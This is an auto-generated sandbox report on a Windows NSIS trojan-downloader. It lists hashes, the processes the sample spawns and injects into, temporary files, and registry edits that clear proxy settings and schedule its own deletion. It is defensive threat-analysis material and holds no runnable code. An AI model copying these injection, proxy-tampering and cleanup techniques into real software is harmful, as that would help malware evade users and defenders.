Trojan.NSIS.StartPage_2a8f25cc1f

by malwarelabrobot on November 28th, 2016 in Malware Descriptions.

Trojan-Downloader.NSIS.Adload.bx (Kaspersky), Trojan.NSIS.StartPage.FD, Trojan.Win32.Swrort.3.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan-Downloader, Trojan


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

MD5: 2a8f25cc1fb9b6a8a14ec60736204e6f
SHA1: a74b910fcf8ce654ff7c033db73829927da9ebb4
SHA256: 1962b2d744537ea4c47fd9558d603cff83277737549f96c7ecc3b9c947a6b08e
SSDeep: 49152:vkojVzPgTpZLN8lT0RwkducdYETwAUC6asxS1HDJ:vkrZLmKRwtcdYETwfC6aYSP
Size: 2660132 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: PolyEnE001byLennartHedlund, UPolyXv05_v6
Company: no certificate found
Created at: 2009-12-06 00:50:52
Analyzed on: Windows7 SP1 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

Setup__2140_il2.exe:3044
sevensetup.exe:2608
583afdedde2bb_ua.exe:1576
cpSetup.exe:2892
G5wycqyxwV.exe:3900

The Trojan injects its code into the following process(es):

Setup__2140_il2.exe:896
setup.exe:1104
%original file name%.exe:3584

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process Setup__2140_il2.exe:3044 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\GPS1JHSL\index[1].htm (9382 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\GPS1JHSL\index[1].htm (0 bytes)

The process Setup__2140_il2.exe:896 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\318DR7NG\index[1].htm (7399 bytes)

The process sevensetup.exe:2608 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi94C1.tmp\inetc.dll (64 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\8PAU9PHE.txt (117 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\PXLM8U2Q.txt (115 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi94C1.tmp\583afdedde2bb_ua.exe (253391 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nss94B0.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi94C1.tmp\inetc.dll (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi94C1.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi94C1.tmp\583afdedde2bb_ua.exe (0 bytes)

The process cpSetup.exe:2892 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\318DR7NG\normal_bg[1].jpg (1633 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Internet Explorer\MSIMGSIZ.DAT (384 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\Z6N4XLNR\appImg[1].jpg (4 bytes)

The process setup.exe:1104 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\spc_player.dll (64 bytes)

The process G5wycqyxwV.exe:3900 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4683.tmp\nsArray.dll (14 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4683.tmp\Setup__2140_il2.exe (52926 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4673.tmp (1568 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4683.tmp\cpSetup.exe (58228 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4683.tmp\1104817113 (871 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4683.tmp\sevensetup.exe (4705 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4683.tmp\NSISdl.dll (31 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nss4662.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4683.tmp\Setup__2140_il2.exe (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4683.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4683.tmp\nsArray.dll (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4683.tmp\1104817113 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4683.tmp\sevensetup.exe (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4683.tmp\cpSetup.exe (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4683.tmp\NSISdl.dll (0 bytes)

The process %original file name%.exe:3584 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi28E5.tmp\ItNP6AjIFY (165 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi28E5.tmp\System.dll (23 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi28E5.tmp\G5wycqyxwV.exe (5293 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\30EV4AVE\583afdd9a9098[1].exe (3920 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi28E5.tmp\inetc.dll (44 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\GPS1JHSL\launch_reb[1].htm (165 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi28E5.tmp\B (38534 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsn28B5.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi28E5.tmp (0 bytes)

Registry activity

The process Setup__2140_il2.exe:3044 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCR\vinyls.tramell]
"(Default)" = "Inst Class"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecision" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\Setup__2140_il2_RASMANCS]
"ConsoleTracingMask" = "4294901760"

[HKCR\CLSID\{dded0858-104b-4eec-a82e-a44b49d78594}\TypeLib]
"(Default)" = "{a0e998a2-81f0-420b-a12b-563442cf5349}"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKCR\TypeLib\{A0E998A2-81F0-420B-A12B-563442CF5349}\1.0]
"(Default)" = "InstallerLib"

[HKCR\Interface\{3669AAD1-E076-4750-857A-D9FFB5D3F180}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKLM\SOFTWARE\Microsoft\Tracing\Setup__2140_il2_RASMANCS]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\Setup__2140_il2_RASAPI32]
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "1479738615"

[HKCR\CLSID\{dded0858-104b-4eec-a82e-a44b49d78594}\ProgID]
"(Default)" = "vinyls.tramell.1"

[HKCR\CLSID\{dded0858-104b-4eec-a82e-a44b49d78594}\VersionIndependentProgID]
"(Default)" = "vinyls.tramell"

[HKLM\SOFTWARE\Microsoft\Tracing\Setup__2140_il2_RASMANCS]
"FileTracingMask" = "4294901760"

[HKCR\CLSID\{dded0858-104b-4eec-a82e-a44b49d78594}\LocalServer32]
"(Default)" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4683.tmp\Setup__2140_il2.exe"

[HKLM\SOFTWARE\Microsoft\Tracing\Setup__2140_il2_RASAPI32]
"ConsoleTracingMask" = "4294901760"

[HKCR\Interface\{3669AAD1-E076-4750-857A-D9FFB5D3F180}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Interface\{3669AAD1-E076-4750-857A-D9FFB5D3F180}\TypeLib]
"Version" = "1.0"

[HKCR\TypeLib\{A0E998A2-81F0-420B-A12B-563442CF5349}\1.0\HELPDIR]
"(Default)" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4683.tmp"

[HKCR\TypeLib\{A0E998A2-81F0-420B-A12B-563442CF5349}\1.0\FLAGS]
"(Default)" = "0"

[HKCR\TypeLib\{A0E998A2-81F0-420B-A12B-563442CF5349}\1.0\0\win32]
"(Default)" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4683.tmp\Setup__2140_il2.exe"

[HKCR\vinyls.tramell.1\CLSID]
"(Default)" = "{dded0858-104b-4eec-a82e-a44b49d78594}"

[HKCR\Interface\{3669AAD1-E076-4750-857A-D9FFB5D3F180}\TypeLib]
"(Default)" = "{A0E998A2-81F0-420B-A12B-563442CF5349}"

[HKCR\Interface\{3669AAD1-E076-4750-857A-D9FFB5D3F180}]
"(Default)" = "IBoot"

[HKCR\CLSID\{dded0858-104b-4eec-a82e-a44b49d78594}\LocalServer32]
"ServerExecutable" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4683.tmp\Setup__2140_il2.exe"

[HKLM\SOFTWARE\Microsoft\Tracing\Setup__2140_il2_RASAPI32]
"EnableFileTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecisionReason" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\Setup__2140_il2_RASMANCS]
"EnableConsoleTracing" = "0"

[HKCR\CLSID\{dded0858-104b-4eec-a82e-a44b49d78594}]
"(Default)" = "Inst Class"

[HKCR\vinyls.tramell.1]
"(Default)" = "Inst Class"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3A 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Tracing\Setup__2140_il2_RASMANCS]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"Name" = "Setup__2140_il2.exe"

[HKLM\SOFTWARE\Microsoft\Tracing\Setup__2140_il2_RASAPI32]
"FileTracingMask" = "4294901760"
"MaxFileSize" = "1048576"

[HKCR\CLSID\{dded0858-104b-4eec-a82e-a44b49d78594}\Version]
"(Default)" = "1.0"

[HKLM\SOFTWARE\Microsoft\Tracing\Setup__2140_il2_RASMANCS]
"FileDirectory" = "%windir%\tracing"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecisionTime" = "50 6C 24 3E C4 48 D2 01"

[HKLM\SOFTWARE\Microsoft\Tracing\Setup__2140_il2_RASAPI32]
"EnableConsoleTracing" = "0"

[HKCR\vinyls.tramell\CurVer]
"(Default)" = "vinyls.tramell.1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following registry key(s):

[HKCR\Interface\{3669AAD1-E076-4750-857A-D9FFB5D3F180}\ProxyStubClsid]
[HKCR\Interface\{3669AAD1-E076-4750-857A-D9FFB5D3F180}]
[HKCR\vinyls.tramell.1]
[HKCR\vinyls.tramell\CurVer]
[HKCR\CLSID\{dded0858-104b-4eec-a82e-a44b49d78594}]
[HKCR\TypeLib\{A0E998A2-81F0-420B-A12B-563442CF5349}\1.0\FLAGS]
[HKCR\Interface\{3669AAD1-E076-4750-857A-D9FFB5D3F180}\ProxyStubClsid32]
[HKCR\CLSID\{dded0858-104b-4eec-a82e-a44b49d78594}\ProgID]
[HKCR\CLSID\{dded0858-104b-4eec-a82e-a44b49d78594}\LocalServer32]
[HKCR\CLSID\{dded0858-104b-4eec-a82e-a44b49d78594}\Version]
[HKCR\TypeLib\{A0E998A2-81F0-420B-A12B-563442CF5349}\1.0\0]
[HKCR\TypeLib\{A0E998A2-81F0-420B-A12B-563442CF5349}\1.0\0\win32]
[HKCR\CLSID\{dded0858-104b-4eec-a82e-a44b49d78594}\Programmable]
[HKCR\vinyls.tramell.1\CLSID]
[HKCR\CLSID\{dded0858-104b-4eec-a82e-a44b49d78594}\TypeLib]
[HKCR\Interface\{3669AAD1-E076-4750-857A-D9FFB5D3F180}\TypeLib]
[HKCR\vinyls.tramell]
[HKCR\TypeLib\{A0E998A2-81F0-420B-A12B-563442CF5349}\1.0]
[HKCR\TypeLib\{A0E998A2-81F0-420B-A12B-563442CF5349}]
[HKCR\TypeLib\{A0E998A2-81F0-420B-A12B-563442CF5349}\1.0\HELPDIR]
[HKCR\CLSID\{dded0858-104b-4eec-a82e-a44b49d78594}\VersionIndependentProgID]

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"ProxyOverride"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"

[HKCR\CLSID\{dded0858-104b-4eec-a82e-a44b49d78594}\LocalServer32]
"ServerExecutable"

The process Setup__2140_il2.exe:896 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCR\vinyls.tramell]
"(Default)" = "Inst Class"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecision" = "0"

[HKCR\CLSID\{dded0858-104b-4eec-a82e-a44b49d78594}\TypeLib]
"(Default)" = "{a0e998a2-81f0-420b-a12b-563442cf5349}"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKCR\TypeLib\{A0E998A2-81F0-420B-A12B-563442CF5349}\1.0]
"(Default)" = "InstallerLib"

[HKCR\Interface\{3669AAD1-E076-4750-857A-D9FFB5D3F180}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "1479738615"

[HKCR\CLSID\{dded0858-104b-4eec-a82e-a44b49d78594}\ProgID]
"(Default)" = "vinyls.tramell.1"

[HKCR\CLSID\{dded0858-104b-4eec-a82e-a44b49d78594}\VersionIndependentProgID]
"(Default)" = "vinyls.tramell"

[HKCR\CLSID\{dded0858-104b-4eec-a82e-a44b49d78594}\LocalServer32]
"(Default)" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4683.tmp\Setup__2140_il2.exe"

[HKCR\Interface\{3669AAD1-E076-4750-857A-D9FFB5D3F180}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Interface\{3669AAD1-E076-4750-857A-D9FFB5D3F180}\TypeLib]
"Version" = "1.0"

[HKCR\TypeLib\{A0E998A2-81F0-420B-A12B-563442CF5349}\1.0\HELPDIR]
"(Default)" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4683.tmp"

[HKCR\TypeLib\{A0E998A2-81F0-420B-A12B-563442CF5349}\1.0\FLAGS]
"(Default)" = "0"

[HKCR\TypeLib\{A0E998A2-81F0-420B-A12B-563442CF5349}\1.0\0\win32]
"(Default)" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4683.tmp\Setup__2140_il2.exe"

[HKCR\vinyls.tramell.1\CLSID]
"(Default)" = "{dded0858-104b-4eec-a82e-a44b49d78594}"

[HKCR\Interface\{3669AAD1-E076-4750-857A-D9FFB5D3F180}\TypeLib]
"(Default)" = "{A0E998A2-81F0-420B-A12B-563442CF5349}"

[HKCR\Interface\{3669AAD1-E076-4750-857A-D9FFB5D3F180}]
"(Default)" = "IBoot"

[HKCR\CLSID\{dded0858-104b-4eec-a82e-a44b49d78594}\LocalServer32]
"ServerExecutable" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4683.tmp\Setup__2140_il2.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecisionReason" = "1"

[HKCR\CLSID\{dded0858-104b-4eec-a82e-a44b49d78594}]
"(Default)" = "Inst Class"

[HKCR\vinyls.tramell.1]
"(Default)" = "Inst Class"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3C 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"Name" = "Setup__2140_il2.exe"

[HKCR\CLSID\{dded0858-104b-4eec-a82e-a44b49d78594}\Version]
"(Default)" = "1.0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecisionTime" = "50 6C 24 3E C4 48 D2 01"

[HKCR\vinyls.tramell\CurVer]
"(Default)" = "vinyls.tramell.1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"ProxyOverride"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"

The process sevensetup.exe:2608 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\sevensetup_RASAPI32]
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\sevensetup_RASMANCS]
"EnableConsoleTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecision" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\sevensetup_RASAPI32]
"EnableConsoleTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecisionReason" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\sevensetup_RASAPI32]
"FileDirectory" = "%windir%\tracing"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\sevensetup_RASMANCS]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\sevensetup_RASAPI32]
"EnableFileTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 38 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Tracing\sevensetup_RASMANCS]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\sevensetup_RASAPI32]
"MaxFileSize" = "1048576"
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\sevensetup_RASMANCS]
"ConsoleTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecisionTime" = "50 6C 24 3E C4 48 D2 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\sevensetup_RASMANCS]
"FileTracingMask" = "4294901760"

[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi94C1.tmp\583afdedde2bb_ua.exe,"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"AutoConfigURL"

The process 583afdedde2bb_ua.exe:1576 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\DDECache\IExplore\WWW_OpenURL]
"processname" = "iexplore.exe"
"WindowClassName" = "DDEMLMom"

The process cpSetup.exe:2892 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\cpSetup_RASAPI32]
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\cpSetup_RASMANCS]
"FileTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "1480239567"

[HKLM\SOFTWARE\Microsoft\Tracing\cpSetup_RASAPI32]
"EnableFileTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecisionReason" = "1"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"Name" = "cpSetup.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecisionTime" = "50 6C 24 3E C4 48 D2 01"

[HKLM\SOFTWARE\Microsoft\Tracing\cpSetup_RASMANCS]
"EnableFileTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecision" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\cpSetup_RASAPI32]
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\cpSetup_RASMANCS]
"FileDirectory" = "%windir%\tracing"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 37 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Tracing\cpSetup_RASMANCS]
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\cpSetup_RASAPI32]
"EnableConsoleTracing" = "0"
"FileTracingMask" = "4294901760"
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\cpSetup_RASMANCS]
"MaxFileSize" = "1048576"
"ConsoleTracingMask" = "4294901760"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"ProxyOverride"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Internet Explorer\LowRegistry]
"AddToFavoritesInitialSelection"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Internet Explorer\LowRegistry]
"AddToFeedsInitialSelection"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"

The process G5wycqyxwV.exe:3900 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi94C1.tmp\583afdedde2bb_ua.exe, , \??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi94C1.tmp\, , \??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4683.tmp\Setup__2140_il2.exe,"

The process %original file name%.exe:3584 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\2a8f25cc1fb9b6a8a14ec60736204e6f_RASMANCS]
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\2a8f25cc1fb9b6a8a14ec60736204e6f_RASAPI32]
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\2a8f25cc1fb9b6a8a14ec60736204e6f_RASMANCS]
"EnableConsoleTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\2a8f25cc1fb9b6a8a14ec60736204e6f_RASMANCS]
"MaxFileSize" = "1048576"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{24C5EDBC-2851-452A-B521-5DA992F6C1B5}]
"WpadDecision" = "3"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad]
"WpadLastNetwork" = "{24C5EDBC-2851-452A-B521-5DA992F6C1B5}"

[HKLM\SOFTWARE\Microsoft\Tracing\2a8f25cc1fb9b6a8a14ec60736204e6f_RASMANCS]
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\2a8f25cc1fb9b6a8a14ec60736204e6f_RASAPI32]
"FileTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{24C5EDBC-2851-452A-B521-5DA992F6C1B5}]
"WpadDecisionTime" = "10 CC 7D 3D C4 48 D2 01"

[HKLM\SOFTWARE\Microsoft\Tracing\2a8f25cc1fb9b6a8a14ec60736204e6f_RASMANCS]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\2a8f25cc1fb9b6a8a14ec60736204e6f_RASAPI32]
"ConsoleTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"DefaultConnectionSettings" = "46 00 00 00 09 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Tracing\2a8f25cc1fb9b6a8a14ec60736204e6f_RASAPI32]
"FileDirectory" = "%windir%\tracing"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecision" = "3"
"WpadDecisionReason" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 36 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Tracing\2a8f25cc1fb9b6a8a14ec60736204e6f_RASAPI32]
"MaxFileSize" = "1048576"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{24C5EDBC-2851-452A-B521-5DA992F6C1B5}]
"WpadNetworkName" = "Network 2"
"WpadDecisionReason" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\2a8f25cc1fb9b6a8a14ec60736204e6f_RASMANCS]
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\2a8f25cc1fb9b6a8a14ec60736204e6f_RASAPI32]
"EnableFileTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecisionTime" = "10 CC 7D 3D C4 48 D2 01"

Proxy settings are disabled:

